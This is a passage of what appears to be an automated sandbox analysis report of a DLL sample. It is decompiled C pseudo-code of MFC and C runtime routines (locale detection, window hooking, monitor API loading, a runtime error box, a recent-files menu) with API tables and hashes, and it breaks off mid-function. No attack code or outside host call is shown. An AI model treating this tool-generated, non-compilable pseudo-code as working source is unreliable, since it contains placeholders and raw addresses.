                                                                        0x10034b1c
                                                                        0x10034b1d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b1f
                                                                        0x10034b22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034b22
                                                                        0x00000000
                                                                        0x10034b0d
                                                                        0x10034ab6
                                                                        0x10034ac4
                                                                        0x10034ac7
                                                                        0x10034ad1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10034ad3
                                                                        0x10034adf
                                                                        0x10034ae5
                                                                        0x10034af3
                                                                        0x10034af8
                                                                        0x10034afb
                                                                        0x10034afd
                                                                        0x10034afd
                                                                        0x00000000
                                                                        0x10034afd
                                                                        0x10034a1d
                                                                        0x10034a28
                                                                        0x10034a3f
                                                                        0x10034a4e
                                                                        0x10034a70
                                                                        0x10034a79
                                                                        0x10034a7c
                                                                        0x10034a81
                                                                        0x10034a87
                                                                        0x10034a95
                                                                        0x10034a98
                                                                        0x10034a9a
                                                                        0x10034a9c
                                                                        0x10034a9f
                                                                        0x10034a9f
                                                                        0x10034aa3
                                                                        0x10034aa3
                                                                        0x00000000
                                                                        0x10034a28
                                                                        0x10034991
                                                                        0x100349a3
                                                                        0x100349a6
                                                                        0x100349ad
                                                                        0x100349b5
                                                                        0x100349bd
                                                                        0x100349ca
                                                                        0x100349d3
                                                                        0x100349d5
                                                                        0x100349d8
                                                                        0x100349dd
                                                                        0x100349df
                                                                        0x100349ea
                                                                        0x100349ef
                                                                        0x100349f2
                                                                        0x100349f4
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                        • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                        • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        • GetVersion.KERNEL32 ref: 100349FB
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10034A20
                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10034A46
                                                                        • ConvertDefaultLocale.KERNEL32(?), ref: 10034A92
                                                                        • ConvertDefaultLocale.KERNEL32(76D84DE0), ref: 10034A98
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10034AA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                        • API String ID: 780041395-483790700
                                                                        • Opcode ID: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction ID: 7cfe531e2014ce0a7197dcc2f573d90a24e44201c953dd79459b2257b218328e
                                                                        • Opcode Fuzzy Hash: b751cc2896b4dc922988b93c4690cf324e453cc8dd7871bdd23ac9d4d6c5d43c
                                                                        • Instruction Fuzzy Hash: 00515F75D0022DAFDB12DFE6DC85AEFBBF8EB48355F11442AE501EB140DB7899409BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100235CF Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E100235CF(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x1004c470; // 0x1bfbe703
				_push(0x100347fd);
				_v8 = _t52;
				_t90 = E10037855(0x1004efe8);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_push(__edi);
					_t99 =  *_a12;
					_t56 =  *(E100373B5() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1004f354 == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x1004ef68 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x1004ef68) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, 0x10023477);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10011C50( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x1004ef68 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10011CB0(_t90, _t99,  &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E1002212F(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002292C);
							if(_t81 != E1002292C) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E100117AE(_t60, _v8);
				}
			}























                                                                        0x100235d8
                                                                        0x100235de
                                                                        0x100235e8
                                                                        0x100235f4
                                                                        0x100235f6
                                                                        0x10023613
                                                                        0x10023616
                                                                        0x10023617
                                                                        0x10023620
                                                                        0x10023624
                                                                        0x10023627
                                                                        0x10023642
                                                                        0x10023692
                                                                        0x10023694
                                                                        0x100236db
                                                                        0x10023718
                                                                        0x1002372a
                                                                        0x10023761
                                                                        0x10023766
                                                                        0x1002376e
                                                                        0x10023771
                                                                        0x10023779
                                                                        0x10023786
                                                                        0x1002378f
                                                                        0x1002379e
                                                                        0x100237a1
                                                                        0x100237b1
                                                                        0x100237b1
                                                                        0x1002379e
                                                                        0x10023786
                                                                        0x00000000
                                                                        0x10023771
                                                                        0x00000000
                                                                        0x1002372c
                                                                        0x100236df
                                                                        0x100236ea
                                                                        0x100236f8
                                                                        0x10023707
                                                                        0x10023710
                                                                        0x10023716
                                                                        0x10023748
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023752
                                                                        0x1002375f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002375f
                                                                        0x00000000
                                                                        0x10023716
                                                                        0x1002369b
                                                                        0x100236a4
                                                                        0x100236bc
                                                                        0x100236be
                                                                        0x100236c6
                                                                        0x100236c8
                                                                        0x100236c8
                                                                        0x100236ca
                                                                        0x00000000
                                                                        0x100236ca
                                                                        0x10023654
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002365a
                                                                        0x10023662
                                                                        0x10023670
                                                                        0x10023675
                                                                        0x1002367b
                                                                        0x1002367b
                                                                        0x1002368c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100237b7
                                                                        0x100237b7
                                                                        0x100237cc
                                                                        0x100237ce
                                                                        0x100237d3
                                                                        0x100237d9
                                                                        0x100237d9
                                                                        0x100237de
                                                                        0x00000000
                                                                        0x100237e0
                                                                        0x100235f8
                                                                        0x10023604
                                                                        0x100237e1
                                                                        0x100237eb
                                                                        0x100237eb

                                                                        APIs
                                                                          • Part of subcall function 10037855: __EH_prolog.LIBCMT ref: 1003785A
                                                                        • CallNextHookEx.USER32 ref: 10023604
                                                                        • GetClassLongA.USER32 ref: 10023649
                                                                        • GlobalGetAtomNameA.KERNEL32 ref: 10023675
                                                                        • lstrcmpiA.KERNEL32(?,ime,?,?,100347FD), ref: 10023684
                                                                        • SetWindowLongA.USER32(?,000000FC,Function_0002292C), ref: 100236BE
                                                                        • CallNextHookEx.USER32 ref: 100237C2
                                                                        • UnhookWindowsHookEx.USER32(?), ref: 100237D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                        • String ID: #32768$AfxOldWndProc423$ime
                                                                        • API String ID: 3204395069-4034971020
                                                                        • Opcode ID: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction ID: 9db2fd6ca1a0fe5cf1724ce820e3dc2bd2b139ec8c0118dd51308d1b35c9be8a
                                                                        • Opcode Fuzzy Hash: 60e81f5e3488c30badae242d963b3e25ed67a4f765a4769238edff23d7bb639b
                                                                        • Instruction Fuzzy Hash: 1051AB75504269BFDF12DF61EC88FAA7BB9EF053A0F618164F814EA1A1C730DA44CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000799F Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E1000799F() {
				void* __edi;
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1004ee14; // 0x0
				if(_t23 == 0) {
					_push(_t17);
					 *0x1004ee18 = E10007952(_t17);
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x1004edf8 = 0;
						 *0x1004edfc = 0;
						 *0x1004ee00 = 0;
						 *0x1004ee04 = 0;
						 *0x1004ee08 = 0;
						 *0x1004ee0c = 0;
						 *0x1004ee10 = 0;
						 *0x1004ee14 = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x1004edf8 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x1004edfc = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x1004ee00 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x1004ee04 = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x1004ee0c = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x1004ee08 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x1004ee10 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x1004ee14 = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x1004ee08; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}
















                                                                        0x100079a2
                                                                        0x100079a8
                                                                        0x100079b8
                                                                        0x100079c3
                                                                        0x100079ce
                                                                        0x100079d2
                                                                        0x10007a5f
                                                                        0x10007a5f
                                                                        0x10007a65
                                                                        0x10007a6b
                                                                        0x10007a71
                                                                        0x10007a77
                                                                        0x10007a7d
                                                                        0x10007a83
                                                                        0x10007a89
                                                                        0x10007a93
                                                                        0x100079d8
                                                                        0x100079e4
                                                                        0x100079e8
                                                                        0x100079ed
                                                                        0x00000000
                                                                        0x100079ef
                                                                        0x100079f5
                                                                        0x100079f9
                                                                        0x100079fe
                                                                        0x00000000
                                                                        0x10007a00
                                                                        0x10007a06
                                                                        0x10007a0a
                                                                        0x10007a0f
                                                                        0x00000000
                                                                        0x10007a11
                                                                        0x10007a17
                                                                        0x10007a1b
                                                                        0x10007a20
                                                                        0x00000000
                                                                        0x10007a22
                                                                        0x10007a28
                                                                        0x10007a2c
                                                                        0x10007a31
                                                                        0x00000000
                                                                        0x10007a33
                                                                        0x10007a39
                                                                        0x10007a3d
                                                                        0x10007a42
                                                                        0x00000000
                                                                        0x10007a44
                                                                        0x10007a4a
                                                                        0x10007a4e
                                                                        0x10007a53
                                                                        0x00000000
                                                                        0x10007a55
                                                                        0x10007a57
                                                                        0x10007a58
                                                                        0x10007a58
                                                                        0x10007a53
                                                                        0x10007a42
                                                                        0x10007a31
                                                                        0x10007a20
                                                                        0x10007a0f
                                                                        0x100079fe
                                                                        0x100079ed
                                                                        0x10007a98
                                                                        0x100079aa
                                                                        0x100079ac
                                                                        0x100079b6
                                                                        0x100079b6

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(USER32,?,?,?,10007AF0), ref: 100079C8
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100079E4
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100079F5
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10007A06
                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10007A17
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10007A28
                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10007A39
                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10007A4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                        • API String ID: 667068680-68207542
                                                                        • Opcode ID: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction ID: ffa68e8141f0c788966a5bf5f1ab221f1da63df34d474a4f7eb5d2f911dd9ebc
                                                                        • Opcode Fuzzy Hash: c432c94375e8382fa0d09503a03fb3d1310a5af8d0fbbc4bfd570d7384b4b05a
                                                                        • Instruction Fuzzy Hash: 05214F71E055B19EF702EF678EC482EBAE5F38B381351483FD109D6125C7B44D518B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016994 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E10016994() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x1004c470; // 0x1bfbe703
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x1004cb88 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x1004cb88; // 0x28000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1004f3d4; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1004f3d8 == 1) {
						_t17 = _t67 + 0x1004cb8c; // 0x10042328
						_t69 = _t17;
						_t24 = E10011820( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10017B90(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10011820(_t70 - 0x80) + 1 > 0x3c) {
								E10019E20(E10011820(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10011820(_t63);
							_t12 = _t67 + 0x1004cb8c; // 0x10042328
							_t14 = E10011820( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E10010B20(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10017B90(_t51, "Runtime Error!\n\nProgram: ");
							E10017BA0(_t51, _t63);
							E10017BA0(_t51, "\n\n");
							_t15 = _t67 + 0x1004cb8c; // 0x10042328
							E10017BA0(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E10019D1D();
						}
					}
				}
				return E100117AE(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}















                                                                        0x10016995
                                                                        0x1001699c
                                                                        0x100169a2
                                                                        0x100169a7
                                                                        0x100169af
                                                                        0x100169b8
                                                                        0x100169ba
                                                                        0x100169c3
                                                                        0x100169c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100169c7
                                                                        0x100169cb
                                                                        0x100169ce
                                                                        0x100169d4
                                                                        0x100169da
                                                                        0x100169e2
                                                                        0x10016acf
                                                                        0x10016acf
                                                                        0x10016ad7
                                                                        0x10016ae9
                                                                        0x100169f9
                                                                        0x100169ff
                                                                        0x10016a0f
                                                                        0x10016a1d
                                                                        0x10016a28
                                                                        0x10016a2e
                                                                        0x10016a2f
                                                                        0x10016a3f
                                                                        0x10016a5b
                                                                        0x10016a60
                                                                        0x10016a60
                                                                        0x10016a64
                                                                        0x10016a69
                                                                        0x10016a76
                                                                        0x10016a7e
                                                                        0x10016a82
                                                                        0x10016a87
                                                                        0x10016a8f
                                                                        0x10016a96
                                                                        0x10016aa1
                                                                        0x10016aa6
                                                                        0x10016aad
                                                                        0x10016ab2
                                                                        0x10016ab7
                                                                        0x10016abc
                                                                        0x10016abd
                                                                        0x10016ac2
                                                                        0x100169ff
                                                                        0x100169e2
                                                                        0x10016b0a

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016A15
                                                                        • _strcat.LIBCMT ref: 10016A28
                                                                        • _strlen.LIBCMT ref: 10016A35
                                                                        • _strlen.LIBCMT ref: 10016A44
                                                                        • _strncpy.LIBCMT ref: 10016A5B
                                                                        • _strlen.LIBCMT ref: 10016A64
                                                                        • _strlen.LIBCMT ref: 10016A71
                                                                        • _strcat.LIBCMT ref: 10016A8F
                                                                        • _strlen.LIBCMT ref: 10016AD7
                                                                        • GetStdHandle.KERNEL32(000000F4,10042328,00000000,?,00000000,00000000,00000000,00000000), ref: 10016AE2
                                                                        • WriteFile.KERNEL32(00000000), ref: 10016AE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                        • API String ID: 3601721357-4022980321
                                                                        • Opcode ID: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction ID: a98b9a16bc0a3033c6b9ef3d9cc886c10ccef6c9644ec2f046cd71b0d49ba214
                                                                        • Opcode Fuzzy Hash: d9df06dfbccc529ba4e4772b6333d36022795db3091ded2d1c9dd1f49d36b4f7
                                                                        • Instruction Fuzzy Hash: 6331F4765002146BEB21EB74CCD6EAA37BDEF48250F10891AF545EB142EF34F9C98B64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024FBB Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 273stringwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E10024FBB(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				char _v268;
				char _v292;
				char _v296;
				signed int _v300;
				CHAR* _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				void* __ebp;
				signed int _t102;
				intOrPtr _t106;
				signed int _t108;
				signed int _t110;
				int* _t118;
				signed int _t125;
				signed int _t128;
				signed int _t132;
				void* _t136;
				intOrPtr* _t138;
				void* _t170;
				intOrPtr* _t171;
				void* _t173;
				int _t175;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t180;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr _t183;
				signed char _t196;
				signed char _t197;
				signed int _t217;
				intOrPtr* _t219;
				intOrPtr* _t220;
				void* _t223;
				intOrPtr* _t224;
				signed int _t226;
				void* _t228;
				void* _t229;
				void* _t230;

				_t223 = __esi;
				_t181 = __ecx;
				_t170 = __ebx;
				_t102 =  *0x1004c470; // 0x1bfbe703
				_push(__esi);
				_push(__edi);
				_v8 = _t102;
				_t219 = __ecx;
				if(_a4 == 0 || lstrlenA(_a4) >= 0x104) {
					L10:
					_push(0);
					_push(0xffffffff);
					_push(3);
					E10027180(_t181);
					asm("int3");
					E10011BF0(0x1003ab29, _t228);
					_t230 = _t229 - 0x12c;
					_t106 =  *0x1004c470; // 0x1bfbe703
					_push(_t170);
					_push(_t223);
					_t224 = _a4;
					_push(_t219);
					_t220 = _t181;
					_t182 =  *(_t224 + 0xc);
					_v20 = _t106;
					_t171 = _t220 + 0x1c;
					_t108 =  *( *_t171 - 0xc);
					__eflags = _t108;
					if(_t108 == 0) {
						__eflags = _t182;
						if(_t182 != 0) {
							E10026397(_t182,  *(_t224 + 4), _t171, _t108);
						}
					}
					_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8))));
					_t110 = 0;
					__eflags =  *(_t183 - 0xc);
					if( *(_t183 - 0xc) != 0) {
						__eflags =  *(_t224 + 0xc);
						if( *(_t224 + 0xc) != 0) {
							_t173 = 0;
							__eflags =  *(_t220 + 4);
							if( *(_t220 + 4) > 0) {
								do {
									DeleteMenu( *( *(_t224 + 0xc) + 4),  *(_t224 + 4) + _t173, 0);
									_t173 = _t173 + 1;
									__eflags = _t173 -  *(_t220 + 4);
								} while (_t173 <  *(_t220 + 4));
							}
							_t110 = GetCurrentDirectoryA(0x104,  &_v292);
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 0x104;
								if(_t110 < 0x104) {
									_t175 = lstrlenA( &_v292);
									 *((char*)(_t228 + _t175 - 0x120)) = 0x5c;
									_t176 = _t175 + 1;
									_v308 = _t176;
									 *((char*)(_t228 + _t176 - 0x120)) = 0;
									_v300 =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
									_v8 = _v8 & 0x00000000;
									_t118 = E100243B2();
									_t216 =  *_t118;
									_v296 =  *((intOrPtr*)( *_t118 + 0xc))() + 0x10;
									_a4 = _a4 & 0x00000000;
									__eflags =  *(_t220 + 4);
									_v8 = 1;
									if( *(_t220 + 4) > 0) {
										while(1) {
											_t125 =  *((intOrPtr*)( *_t220 + 8))( &_v300, _a4,  &_v292, _t176, 1);
											__eflags = _t125;
											if(_t125 == 0) {
												goto L40;
											}
											_t177 = _v300;
											_t128 = E100017D0( &_v296,  *((intOrPtr*)(_t177 - 0xc)) +  *((intOrPtr*)(_t177 - 0xc)));
											while(1) {
												_t196 =  *_t177;
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags = _t196 - 0x26;
												if(_t196 == 0x26) {
													 *_t128 = _t196;
													_t128 = _t128 + 1;
													__eflags = _t128;
												}
												_t197 =  *_t177;
												_t217 = _t197 & 0x000000ff;
												__eflags =  *(_t217 + 0x10050a81) & 0x00000004;
												if(( *(_t217 + 0x10050a81) & 0x00000004) != 0) {
													 *_t128 = _t197;
													_t128 = _t128 + 1;
													_t177 = _t177 + 1;
													__eflags = _t177;
												}
												 *_t128 =  *_t177;
												_t128 = _t128 + 1;
												_t177 = _t177 + 1;
												__eflags = _t177;
											}
											 *_t128 = _t196;
											E10006CE2(_t177,  &_v296, _t220, 0xffffffff);
											_t132 =  *((intOrPtr*)(_t220 + 0x14)) + _a4 + 0x00000001 & 0x0000000f;
											__eflags = _t132 - 0xa;
											if(__eflags <= 0) {
												if(__eflags != 0) {
													wsprintfA( &_v32, ??, "&%d ", _t132);
													goto L38;
												} else {
													lstrcpyA( &_v32, "1&0 ");
												}
											} else {
												wsprintfA( &_v32, ??, "%d ", _t132);
												L38:
												_t230 = _t230 + 0xc;
											}
											_push( &_v32);
											_t136 = E10006B11( &_v312, __eflags);
											_push( &_v296);
											_push(_t136);
											_push( &_v316);
											_v8 = 2;
											_t138 = E10024DC7( &_v296, __eflags);
											_t216 =  *(_t224 + 8);
											_t203 =  *(_t224 + 4);
											_t77 = _t216 + 1; // 0x1
											 *(_t224 + 8) = _t77;
											_t79 = _t203 + 1; // 0x3
											_t230 = _t230 + 0xc;
											 *(_t224 + 4) = _t79;
											_v304 =  *_t138;
											InsertMenuA( *( *(_t224 + 0xc) + 4),  *(_t224 + 8), 0x400,  *(_t224 + 4), _v304);
											E100014B0(_v316 + 0xfffffff0,  *(_t224 + 8));
											_v8 = 1;
